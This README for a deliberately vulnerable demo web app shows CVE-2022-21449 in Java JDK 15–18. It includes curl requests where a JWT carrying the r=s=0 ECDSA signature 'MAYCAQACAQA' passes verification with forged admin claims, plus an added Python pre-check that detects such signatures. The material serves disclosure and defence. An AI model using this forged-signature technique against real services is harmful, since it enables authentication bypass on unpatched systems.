Exploitation and Sample Vulnerable Application of the JWT Null Signature Vulnerability (CVE-2022-21449)
This folder contains a sample web application vulnerable to CVE-2022-21449, a vulnerability in Java JDK versions 15 to 18 that allows bypassing signature checks that use ECDSA signatures (based on elliptic curves).
Run it:
docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/datadog/jwt-null-signature-vulnerable-app
Build it yourself:
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app --rm vulnerable-app
The application has a single endpoint that requires authenticating with a valid JWT (with regard to a randomly-generated private key):
$ curl localhost:8080 -sSL -D-
HTTP/1.1 401
Content-Type: text/plain;charset=UTF-8
Content-Length: 46
Date: Wed, 20 Apr 2022 14:53:06 GMT
You are not authorized to access this endpoint
Specifying an invalid JWT (for instance, signed with any EC256 key) returns an error as well:
# Generated on https://token.dev/ with the algorithm "ES256"
$ JWT=eyJ0eXAiOiJKV1QiLCJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJSaWNrIEFzdGxleSIsImFkbWluIjp0cnVlLCJpYXQiOjE2NTA0NjY1MDIsImV4cCI6MTkwMDQ3MDEwMn0.R05LldFQf7kay5-8hPeJYnYD_ehxKAKFXo-t6Qt7ZKUKkQSQowOHeiZBI9ierO1q6AZlJ4GsXFsxhPrj6m4cMg
$ curl localhost:8080 -sSL -D- -H "Authorization: Bearer $JWT"
HTTP/1.1 401
Content-Type: text/plain;charset=UTF-8
Content-Length: 11
Date: Wed, 20 Apr 2022 14:56:04 GMT
Invalid JWT
However, specifying an ECDSA signature with r=s=0, DER-encoded (MAYCAQACAQA= in base64), allows us to bypass the JWT verification check!
$ echo -ne "MAYCAQACAQA=" | base64 -d | openssl asn1parse -inform der
0:d=0 hl=2 l= 6 cons: SEQUENCE
2:d=1 hl=2 l= 1 prim: INTEGER :00
5:d=1 hl=2 l= 1 prim: INTEGER :00
# Same JWT as above with the malicious signature
$ JWT=eyJ0eXAiOiJKV1QiLCJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJSaWNrIEFzdGxleSIsImFkbWluIjp0cnVlLCJpYXQiOjE2NTA0NjY1MDIsImV4cCI6MTkwMDQ3MDEwMn0.MAYCAQACAQA
$ curl localhost:8080 -sSL -D- -H "Authorization: Bearer $JWT"
HTTP/1.1 200
Content-Type: text/plain;charset=UTF-8
Content-Length: 19
Date: Wed, 20 Apr 2022 14:59:18 GMT
Hello, Rick Astley!
This demo makes use of the popular jjwt library. Similar vulnerabilities are likely to affect other Java-based JWT libraries running on vulnerable JDK versions - the vulnerability does not lie in the libraries themselves, but in the cryptographic primitives provided by the vulnerable JDK.
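A defensive pre-check for the condition demonstrated above, as an added example that is not part of this repository: it extracts r and s from a JWT's signature segment (raw r||s or DER, as in the token above) and flags any value outside [1, n-1], which is the range check the vulnerable JDK omits. The function names are hypothetical, and the token is assumed to be ES256 (P-256); it can be run over logged tokens or in front of signature verification.

```python
import base64

# Order n of the NIST P-256 group used by ES256; valid r and s lie in [1, n-1].
P256_N = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551


def b64url_decode(segment: str) -> bytes:
    """Decode an unpadded base64url JWT segment."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def parse_der_pair(sig: bytes) -> tuple[int, int]:
    """Parse SEQUENCE { INTEGER r, INTEGER s }; P-256 only needs short-form lengths."""
    if len(sig) < 8 or sig[0] != 0x30 or sig[1] != len(sig) - 2:
        raise ValueError("not a short-form DER SEQUENCE")
    values, pos = [], 2
    for _ in range(2):
        if pos + 2 > len(sig) or sig[pos] != 0x02:
            raise ValueError("expected DER INTEGER")
        end = pos + 2 + sig[pos + 1]
        if sig[pos + 1] == 0 or end > len(sig):
            raise ValueError("bad INTEGER length")
        # DER integers are signed: a negative value is also out of range.
        values.append(int.from_bytes(sig[pos + 2:end], "big", signed=True))
        pos = end
    if pos != len(sig):
        raise ValueError("trailing bytes after s")
    return values[0], values[1]


def signature_scalars(jwt: str) -> tuple[int, int]:
    """Return (r, s) from the third JWT segment, raw r||s or DER."""
    parts = jwt.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS")
    sig = b64url_decode(parts[2])
    if len(sig) == 64:  # JWS ES256 format: 32-byte r followed by 32-byte s
        return int.from_bytes(sig[:32], "big"), int.from_bytes(sig[32:], "big")
    return parse_der_pair(sig)


def is_out_of_range_signature(jwt: str) -> bool:
    """True when r or s is outside [1, n-1], e.g. the r=s=0 signature."""
    r, s = signature_scalars(jwt)
    return not (1 <= r < P256_N and 1 <= s < P256_N)
```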
- Disclosure: https://neilmadden.blog/2022/04/19/psychic-signatures-in-java/ by Neil Madden
- This repository: Thomas Etrillard, Christophe Tafani-Dereeper